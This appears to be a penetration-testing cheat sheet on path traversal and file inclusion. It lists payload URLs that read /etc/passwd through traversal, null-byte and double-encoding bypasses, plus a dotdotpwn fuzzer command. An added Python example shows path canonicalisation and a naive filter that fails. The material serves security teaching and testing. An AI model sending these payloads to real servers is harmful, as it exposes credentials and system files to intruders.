Path Traversal/File Inclusion

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This might include:

  • Application code and data.

  • Credentials for back-end systems.

  • Sensitive operating system files.

Basic LFI and bypasses

http://example.com/home.php?id=../../../etc/passwd
http://example.com/home.php?id=....//....//....//etc/passwd
http://example.com/home.php?id=..///////..////..//////etc/passwd
http://example.com/home.php?id=....\/....\/....\/etc/passwd
http://example.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
http://example.com/home.php?id=/var/www/../../etc/passwd

Null Byte

Bypasses code that appends more characters to the end of the provided string (for example: $_GET['param']."php")

http://example.com/home.php?id=../../../../etc/passwd%00
http://example.com/home.php?id=../../../../etc/passwd%00.jpg    (append needed extension)

This has been fixed since PHP 5.4.

Encoding

You can use non-standard encodings, such as double URL encoding:

http://example.com/home.php?id=..%252f..%252f..%252fetc%252fpasswd
http://example.com/home.php?id=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd
http://example.com/home.php?id=%252e%252e%252fetc%252fpasswd%00
http://example.com/home.php?id=%2e%2e%252f%2e%2e%252f%2e%2e%252fetc%2fpasswd

From an existing folder

The back-end may be verifying the folder path:

http://example.com/home.php?id=utils/scripts/../../../../../etc/passwd
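
A defensive counterpart to the request forms listed above, as an added example that is not part of the original page: Python code that canonicalises the requested path and checks that it stays inside a base directory, next to a single-pass "../" filter of the kind the "....//" form gets past. The function names, the temporary base directory and the file name utils/report.txt are assumptions made for the example.

```python
import os
import tempfile
from urllib.parse import unquote

def naive_filter(value):
    # Weak "before" check: strips "../" in a single, non-recursive pass.
    return value.replace("../", "")

def safe_resolve(base_dir, value):
    """Return the canonical path for an already URL-decoded value, or raise ValueError."""
    if "\x00" in value or "\\" in value:
        raise ValueError("null byte or backslash")      # assumed policy: never valid in a name
    if unquote(value) != value:
        raise ValueError("residual percent-encoding")   # a second decode would change the path
    base = os.path.realpath(base_dir)
    # join() lets an absolute value replace base; realpath() collapses "..", "//" and symlinks.
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate

# Constructed inputs: parameter values taken from the URLs above, after one URL-decode.
SAMPLES = [
    "utils/report.txt",                          # hypothetical legitimate file
    "../../../etc/passwd",
    "..///////..////..//////etc/passwd",
    "....\\/....\\/....\\/etc/passwd",
    "/var/www/../../etc/passwd",
    "utils/scripts/../../../../../etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",
    "../../../../etc/passwd\x00.jpg",
]

def verdict(base_dir, value):
    try:
        safe_resolve(base_dir, value)
        return "allowed"
    except ValueError as exc:
        return "rejected: %s" % exc

def demo():
    base = tempfile.mkdtemp()   # stands in for the application's file directory
    return {value: verdict(base, value) for value in SAMPLES}

if __name__ == "__main__":
    rebuilt = naive_filter("....//....//....//etc/passwd")   # filter output is "../../../etc/passwd"
    print(repr(rebuilt), "->", verdict(tempfile.mkdtemp(), rebuilt))
    for value, result in demo().items():
        print(repr(value), "->", result)
```

The check runs on the final value, after every other transformation, which is why the string rebuilt by the single-pass filter is still rejected.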

Tools

dotdotpwn is a very flexible, intelligent fuzzer for discovering directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers and web platforms such as CMSs, ERPs, blogs, etc.

 sudo ./dotdotpwn.pl -m http-url -u https://example.com/image?id=TRAVERSAL -O -k "root:"

Wordlists
